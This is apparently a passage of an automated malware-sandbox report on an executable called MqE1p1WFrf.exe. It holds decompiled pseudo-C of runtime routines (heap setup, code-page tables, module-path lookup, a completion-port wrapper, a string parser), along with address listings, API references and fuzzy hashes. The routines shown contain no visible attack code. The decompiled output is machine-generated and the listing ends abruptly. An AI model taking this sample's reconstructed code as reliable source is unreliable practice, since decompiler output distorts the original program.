                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                  • API String ID: 1646373207-3105848591
                                                                  • Opcode ID: cbf4edb603de46c98f16052170a6e14bf93f6dcdacb73ee4f1c5b75bc6da277b
                                                                  • Instruction ID: 773341f0bc122af7a421b7fb9fa9ae6199085957f6285766b9851f2c0127240e
                                                                  • Opcode Fuzzy Hash: cbf4edb603de46c98f16052170a6e14bf93f6dcdacb73ee4f1c5b75bc6da277b
                                                                  • Instruction Fuzzy Hash: 9DC012A03C431195E9102B725D09F163554AB94B43F1801326505F05C4CB7CE000853E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407B99 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00407B99() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x42d900 != 0xffffffff) {
					_t43 = HeapAlloc( *0x4303d0, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x42d8f0;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x42d8f0) {
							HeapFree( *0x4303d0, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x42d8f0) {
						 *_t43 = 0x42d8f0;
						_t25 =  *0x42d8f4; // 0x42d8f0
						 *(_t43 + 4) = _t25;
						 *0x42d8f4 = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x42d8f0 == 0) {
							 *0x42d8f0 = 0x42d8f0;
						}
						if( *0x42d8f4 == 0) {
							 *0x42d8f4 = 0x42d8f0;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00404560(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}









                                                                  0x00407ba4
                                                                  0x00407bc0
                                                                  0x00407bc4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00407ba6
                                                                  0x00407ba6
                                                                  0x00407bca
                                                                  0x00407be0
                                                                  0x00407be4
                                                                  0x00407cbf
                                                                  0x00407cc5
                                                                  0x00407cd0
                                                                  0x00407cd0
                                                                  0x00407cd6
                                                                  0x00000000
                                                                  0x00407cd6
                                                                  0x00407bfc
                                                                  0x00407cb9
                                                                  0x00000000
                                                                  0x00407cb9
                                                                  0x00407c09
                                                                  0x00407c29
                                                                  0x00407c2b
                                                                  0x00407c30
                                                                  0x00407c33
                                                                  0x00407c3c
                                                                  0x00407c0b
                                                                  0x00407c12
                                                                  0x00407c14
                                                                  0x00407c14
                                                                  0x00407c20
                                                                  0x00407c22
                                                                  0x00407c22
                                                                  0x00407c20
                                                                  0x00407c3e
                                                                  0x00407c44
                                                                  0x00407c4a
                                                                  0x00407c4d
                                                                  0x00407c4d
                                                                  0x00407c50
                                                                  0x00407c53
                                                                  0x00407c56
                                                                  0x00407c59
                                                                  0x00407c60
                                                                  0x00407c62
                                                                  0x00407c6c
                                                                  0x00407c6d
                                                                  0x00407c6f
                                                                  0x00407c72
                                                                  0x00407c75
                                                                  0x00407c81
                                                                  0x00407c89
                                                                  0x00407c92
                                                                  0x00407c99
                                                                  0x00407c9c
                                                                  0x00407c9e
                                                                  0x00407ca5
                                                                  0x00407ca5
                                                                  0x00000000
                                                                  0x00407cad

                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(00000000,00002020,0042D8F0,0042D8F0,?,?,00408065,00000000,00000010,00000000,00000009,00000009,?,00407164,00000010,00000000), ref: 00407BBA
                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00408065,00000000,00000010,00000000,00000009,00000009,?,00407164,00000010,00000000), ref: 00407BDE
                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00408065,00000000,00000010,00000000,00000009,00000009,?,00407164,00000010,00000000), ref: 00407BF8
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00408065,00000000,00000010,00000000,00000009,00000009,?,00407164,00000010,00000000,?), ref: 00407CB9
                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,00408065,00000000,00000010,00000000,00000009,00000009,?,00407164,00000010,00000000,?,00000000), ref: 00407CD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual$FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 714016831-0
                                                                  • Opcode ID: 635fecf0686e8147495ae433dc227c48540e14549f3a2109c94bb06bbcb2258d
                                                                  • Instruction ID: a2b1fc9a7222546d2eeedfc4e970849a447fd50afe59f3d991618bcef1b801eb
                                                                  • Opcode Fuzzy Hash: 635fecf0686e8147495ae433dc227c48540e14549f3a2109c94bb06bbcb2258d
                                                                  • Instruction Fuzzy Hash: 7231AD70E487069FE3349F28EC44B22B7E0B754B54F50823AE165A63D0E7B8B841874E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406ED9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 92%
                                                                  			E00406ED9(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x4301ac,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0040489D(1,  &_v280, 0x100,  &_v1304,  *0x4301ac,  *0x4303c4, 0);
						E00405E07( *0x4303c4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4301ac, 0);
						E00405E07( *0x4303c4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4301ac, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x4301c0) =  *(_t55 + 0x4301c0) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x4302c1) =  *(_t55 + 0x4302c1) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x4301c0) = _t77;
								goto L16;
							}
							 *(_t55 + 0x4302c1) =  *(_t55 + 0x4302c1) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x4301c0) =  *(_t43 + 0x4301c0) & 0x00000000;
						} else {
							 *(_t43 + 0x4302c1) =  *(_t43 + 0x4302c1) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x4302c1) =  *(_t43 + 0x4302c1) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x4301c0) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                                                                  0x00406ef6
                                                                  0x00406efc
                                                                  0x00406f03
                                                                  0x00406f03
                                                                  0x00406f0a
                                                                  0x00406f0b
                                                                  0x00406f0f
                                                                  0x00406f12
                                                                  0x00406f1b
                                                                  0x00406f54
                                                                  0x00406f73
                                                                  0x00406f97
                                                                  0x00406fbf
                                                                  0x00406fc7
                                                                  0x00406fc9
                                                                  0x00406fcf
                                                                  0x00406fcf
                                                                  0x00406fd5
                                                                  0x00406ff0
                                                                  0x00407002
                                                                  0x00000000
                                                                  0x00407002
                                                                  0x00406ff2
                                                                  0x00406ff9
                                                                  0x00406fe5
                                                                  0x00406fe5
                                                                  0x00000000
                                                                  0x00406fe5
                                                                  0x00406fd7
                                                                  0x00406fde
                                                                  0x00000000
                                                                  0x00407009
                                                                  0x00407009
                                                                  0x0040700b
                                                                  0x0040700c
                                                                  0x00000000
                                                                  0x00406fcf
                                                                  0x00406f1f
                                                                  0x00406f22
                                                                  0x00406f22
                                                                  0x00406f25
                                                                  0x00406f2a
                                                                  0x00406f2e
                                                                  0x00406f35
                                                                  0x00406f3d
                                                                  0x00406f47
                                                                  0x00406f47
                                                                  0x00406f47
                                                                  0x00406f4a
                                                                  0x00406f4b
                                                                  0x00406f4e
                                                                  0x00000000
                                                                  0x00406f53
                                                                  0x00407012
                                                                  0x00407019
                                                                  0x0040701c
                                                                  0x0040703a
                                                                  0x0040704f
                                                                  0x00407041
                                                                  0x00407041
                                                                  0x0040704a
                                                                  0x00000000
                                                                  0x0040704a
                                                                  0x00407023
                                                                  0x00407023
                                                                  0x0040702c
                                                                  0x0040702f
                                                                  0x0040702f
                                                                  0x0040702f
                                                                  0x00407056
                                                                  0x00407057
                                                                  0x0040705d

                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,00000000), ref: 00406EED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: $
                                                                  • API String ID: 1807457897-3032137957
                                                                  • Opcode ID: 2f58160fcd86bb917d8442fd6f17e81f8065889d184d94558c555ea80b1e13b3
                                                                  • Instruction ID: 36ca3fe32e67a63c9fbc9c7bbcad4361165e49d33ef72f60ee30b7f067e255e4
                                                                  • Opcode Fuzzy Hash: 2f58160fcd86bb917d8442fd6f17e81f8065889d184d94558c555ea80b1e13b3
                                                                  • Instruction Fuzzy Hash: 62418B314092581EEB12C714DD69BFB3F98EB02704F1412F6D58AE71D2C27A5A54CBAB
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004052FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E004052FC() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				CHAR* _t40;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x4304e8; // 0x1
				if(_t46 == 0) {
					E0040705E();
				}
				_t40 = "C:\\Users\\alfons\\Desktop\\MqE1p1WFrf.exe";
				GetModuleFileNameA(0, _t40, 0x104);
				_t14 =  *0x4304f4; // 0x533358
				 *0x42fe70 = _t40;
				_t37 = _t40;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E00405395(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = E0040707A(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E00404710(8);
				}
				E00405395(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x42fe58 = _t41;
				 *0x42fe54 = _t27;
				return _t27;
			}











                                                                  0x00405300
                                                                  0x00405304
                                                                  0x0040530c
                                                                  0x0040530e
                                                                  0x0040530e
                                                                  0x00405313
                                                                  0x0040531f
                                                                  0x00405325
                                                                  0x0040532a
                                                                  0x00405330
                                                                  0x00405334
                                                                  0x00405336
                                                                  0x00405336
                                                                  0x00405343
                                                                  0x00405357
                                                                  0x0040535e
                                                                  0x00405362
                                                                  0x00405367
                                                                  0x00405379
                                                                  0x00405384
                                                                  0x00405385
                                                                  0x0040538d
                                                                  0x00405394

                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MqE1p1WFrf.exe,00000104,?,00000000,?,?,?,?,004046A8), ref: 0040531F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName
                                                                  • String ID: C:\Users\user\Desktop\MqE1p1WFrf.exe$X3S
                                                                  • API String ID: 514040917-1874214855
                                                                  • Opcode ID: 85e19cde646f44e7e5f8644581cc7cbd6a9282638277fa740e42655b6cf11763
                                                                  • Instruction ID: 78b7c1d46e0e73ef0ec87bd607a53843c51024de2e764679ef996f81ca451794
                                                                  • Opcode Fuzzy Hash: 85e19cde646f44e7e5f8644581cc7cbd6a9282638277fa740e42655b6cf11763
                                                                  • Instruction Fuzzy Hash: 471191B2900108BFD711EFA8DC81C9F77BCEB45798B51017BF504A7251EAB46E45CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004032B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004032B7(long _a4, char _a8) {
				long _v8;
				long _t17;
				intOrPtr _t22;
				long _t23;
				long _t25;
				long _t30;

				_t17 = 0;
				_t30 = _a4;
				if(_a8 != 0) {
					_t17 = E00401BC8(_t30);
				}
				_t3 =  &_a8; // 0x40316f
				GetQueuedCompletionStatus( *(_t30 + 0x1c),  &_v8,  &_a4, _t3, _t17);
				_t7 =  &_a8; // 0x40316f
				_t22 =  *_t7;
				if(_t22 == 0) {
					_t23 = GetLastError();
				} else {
					 *(_t22 + 0x18) =  *(_t22 + 0x18) & 0x00000000;
					_t25 =  *(_t30 + 0x28);
					_t23 = _t22 + 0xfffffff0;
					if(_t25 == 0) {
						 *(_t23 + 0x28) = _t23;
					} else {
						 *(_t23 + 0x28) =  *(_t25 + 0x28);
						 *( *(_t30 + 0x28) + 0x28) = _t23;
					}
					 *(_t30 + 0x28) = _t23;
				}
				return _t23;
			}









                                                                  0x004032bb
                                                                  0x004032c1
                                                                  0x004032c4
                                                                  0x004032c7
                                                                  0x004032cc
                                                                  0x004032ce
                                                                  0x004032dd
                                                                  0x004032e3
                                                                  0x004032e3
                                                                  0x004032e8
                                                                  0x0040330e
                                                                  0x004032ea
                                                                  0x004032ea
                                                                  0x004032ee
                                                                  0x004032f1
                                                                  0x004032f6
                                                                  0x00403309
                                                                  0x004032f8
                                                                  0x004032fb
                                                                  0x00403301
                                                                  0x00403301
                                                                  0x00403304
                                                                  0x00403304
                                                                  0x00403316

                                                                  APIs
                                                                  • GetQueuedCompletionStatus.KERNEL32(?,00000000,00000000,o1@,00000000,00000000,00000000,?,0040316F,00000000,00000000), ref: 004032DD
                                                                  • GetLastError.KERNEL32(?,0040316F,00000000,00000000), ref: 0040330E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: CompletionErrorLastQueuedStatus
                                                                  • String ID: o1@
                                                                  • API String ID: 1532515109-206246701
                                                                  • Opcode ID: 0a19be18f71878abe43233bd8197216bd65629f3c763cdc17342b577bb1acaf9
                                                                  • Instruction ID: e039a7543b8df8ed61f5f5f90ae8d79d2fd2e0b1067978cf746e7ce2c053c418
                                                                  • Opcode Fuzzy Hash: 0a19be18f71878abe43233bd8197216bd65629f3c763cdc17342b577bb1acaf9
                                                                  • Instruction Fuzzy Hash: 3A01E175500604EFC714CF15D8909967BECAF08325B10467AE80AD72A1DB34EA41CB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403968 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33memoryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00403968(intOrPtr _a4, char _a8) {
				intOrPtr* _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t26;

				_t1 =  &_a8; // 0x403533
				_t23 =  *_t1;
				_t25 = _a4;
				_t26 = HeapAlloc( *(_t25 + 0xa4), 8, _t23 + 0x14);
				if(_t26 == 0) {
					return 0;
				}
				_t5 = _t26 + 0x14; // 0x14
				 *((intOrPtr*)(_t26 + 0x10)) = _t23;
				 *((intOrPtr*)(_t26 + 0xc)) = _t5;
				_t8 = _t25 + 0xa0; // 0xa0
				 *((intOrPtr*)(_t26 + 8)) = InterlockedIncrement(_t8);
				_t24 =  *((intOrPtr*)(_t25 + 0x50));
				_t11 = _t25 + 0x50; // 0x50
				_t21 = _t11;
				 *_t26 = _t24;
				 *((intOrPtr*)(_t24 + 4)) = _t26;
				 *((intOrPtr*)(_t26 + 4)) = _t21;
				 *_t21 = _t26;
				return  *((intOrPtr*)(_t26 + 8));
			}








                                                                  0x00403969
                                                                  0x00403969
                                                                  0x0040396f
                                                                  0x00403985
                                                                  0x00403989
                                                                  0x00000000
                                                                  0x004039b9
                                                                  0x0040398b
                                                                  0x0040398e
                                                                  0x00403991
                                                                  0x00403994
                                                                  0x004039a1
                                                                  0x004039a4
                                                                  0x004039a7
                                                                  0x004039a7
                                                                  0x004039aa
                                                                  0x004039ac
                                                                  0x004039af
                                                                  0x004039b2
                                                                  0x00000000

                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,?,00000004,00000004,00000000,00403533,00000000,00000004), ref: 0040397F
                                                                  • InterlockedIncrement.KERNEL32(000000A0), ref: 0040399B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeapIncrementInterlocked
                                                                  • String ID: 35@
                                                                  • API String ID: 3234506828-226558461
                                                                  • Opcode ID: ae04f9c810a63e66526bdb8d20144ff2109ef55581f3447094d5433cb7da461d
                                                                  • Instruction ID: c5cf38e8b126f3bde69ff971ed34a48f9d4d977e82ce93fec1660cdd663c918a
                                                                  • Opcode Fuzzy Hash: ae04f9c810a63e66526bdb8d20144ff2109ef55581f3447094d5433cb7da461d
                                                                  • Instruction Fuzzy Hash: 1AF0C4B5601B16AFC724CF69D580A86FBF8FF48711B00896AE599D3610D370F9198BA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004010C8 Relevance: 5.2, APIs: 4, Instructions: 181memorystringCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 73%
                                                                  			E004010C8(void* __ecx, void* _a4, intOrPtr* _a8, CHAR* _a12, char _a15) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				void* __esi;
				void* _t37;
				void* _t38;
				intOrPtr* _t42;
				int _t44;
				signed int _t49;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t56;
				signed char _t58;
				void* _t60;
				void* _t63;
				signed char _t74;
				signed char _t75;
				CHAR* _t83;
				void* _t84;
				int _t85;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;

				_t85 = lstrlenA(_a12);
				if(_a8 == 0 || _a12 == 0 || _t85 == 0) {
					L41:
					__eflags = 0;
					return 0;
				} else {
					_t4 = _t85 + 1; // 0x1
					_t37 = HeapAlloc(_a4, 8, _t4);
					_t81 = _t37;
					if(_t37 != 0) {
						E00403EE0(_t81, _a12, _t85);
						_t87 = _t87 + 0xc;
					}
					_t38 = E004012BE(_t85, _t81);
					_v8 = _t38;
					if(_t38 == 0) {
						goto L41;
					} else {
						_v16 = 0;
						_a15 = 1;
						asm("stosd");
						_t83 = E00403E30(_v8, 0x42d0d0);
						if(_t83 == 0) {
							L39:
							HeapFree(_a4, 0, _v8);
							if(_a15 == 0) {
								goto L41;
							}
							_t42 = _a8;
							 *_t42 = _v16;
							 *((intOrPtr*)(_t42 + 4)) = _v12;
							return 1;
						}
						while(1) {
							_t44 = lstrlenA(_t83);
							if(_t44 == 0 || _t44 > 2) {
								break;
							}
							_t74 =  *_t83;
							if(_t74 != 0x3f) {
								__eflags = _t44 - 1;
								if(_t44 != 1) {
									__eflags = _t44 - 2;
									if(_t44 != 2) {
										break;
									}
									__eflags =  *0x42d2e0 - 1;
									if( *0x42d2e0 <= 1) {
										_t74 =  *0x42d0d4; // 0x42d0de
										_t49 =  *(_t74 + _t74 * 2) & 0x00000080;
										__eflags = _t49;
									} else {
										_t49 = E00403DBB(_t74, 0x80, _t74, 0x80);
										_pop(_t74);
									}
									__eflags = _t49;
									if(_t49 == 0) {
										break;
									} else {
										__eflags =  *0x42d2e0 - 1;
										if( *0x42d2e0 <= 1) {
											_t50 = _t83[1];
											L27:
											_t75 =  *0x42d0d4; // 0x42d0de
											_t52 =  *(_t75 + _t50 * 2) & 0x00000080;
											__eflags = _t52;
											L28:
											__eflags = _t52;
											if(_t52 == 0) {
												break;
											}
											_t53 = E00403DA4(_t83, 0, 0x10);
											_t88 = _t87 + 0xc;
											__eflags = _t53;
											if(_t53 == 0) {
												break;
											}
											__eflags = _t53 - 0xffffffff;
											if(_t53 == 0xffffffff) {
												break;
											}
											__eflags = _t53 - 0xff;
											if(_t53 > 0xff) {
												break;
											}
											_t54 = E00401009(_a4, _t53, 0);
											_t89 = _t88 + 0xc;
											__eflags = _t54;
											if(_t54 == 0) {
												break;
											}
											_t56 = E0040102C(_a4,  &_v16, _t54);
											_t87 = _t89 + 0xc;
											__eflags = _t56;
											if(_t56 == 0) {
												break;
											}
											L34:
											_t83 = E00403E30(0, 0x42d0d0);
											if(_t83 != 0) {
												continue;
											}
											goto L39;
										}
										_t58 = _t83[1];
										_push(0x80);
										L25:
										_push(_t58);
										_t52 = E00403DBB(_t74, 0x80);
										goto L28;
									}
								}
								__eflags =  *0x42d2e0 - _t44; // 0x1
								if(__eflags <= 0) {
									_t50 = _t74;
									goto L27;
								}
								_push(0x80);
								_t58 = _t74;
								goto L25;
							}
							_t84 = _a4;
							_t60 = E00401009(_t84, 0, 1);
							_t90 = _t87 + 0xc;
							if(_t60 == 0) {
								L36:
								_push( &_v16);
								_push(_t84);
								L38:
								E00401084();
								_a15 = 0;
								goto L39;
							}
							_t63 = E0040102C(_t84,  &_v16, _t60);
							_t87 = _t90 + 0xc;
							if(_t63 == 0) {
								goto L36;
							}
							goto L34;
						}
						_push( &_v16);
						_push(_a4);
						goto L38;
					}
				}
			}





























                                                                  0x004010dc
                                                                  0x004010e1
                                                                  0x004012b7
                                                                  0x004012b7
                                                                  0x00000000
                                                                  0x004010f8
                                                                  0x004010f8
                                                                  0x00401101
                                                                  0x00401107
                                                                  0x0040110b
                                                                  0x00401112
                                                                  0x00401117
                                                                  0x00401117
                                                                  0x0040111b
                                                                  0x00401123
                                                                  0x00401126
                                                                  0x00000000
                                                                  0x0040112c
                                                                  0x00401139
                                                                  0x0040113c
                                                                  0x00401140
                                                                  0x00401146
                                                                  0x0040114c
                                                                  0x00401293
                                                                  0x0040129a
                                                                  0x004012a3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004012a5
                                                                  0x004012ab
                                                                  0x004012b0
                                                                  0x00000000
                                                                  0x004012b3
                                                                  0x00401157
                                                                  0x00401158
                                                                  0x00401160
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040116f
                                                                  0x00401174
                                                                  0x004011a8
                                                                  0x004011ab
                                                                  0x004011c0
                                                                  0x004011c3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004011c9
                                                                  0x004011d0
                                                                  0x004011e3
                                                                  0x004011ec
                                                                  0x004011ec
                                                                  0x004011d2
                                                                  0x004011d7
                                                                  0x004011dd
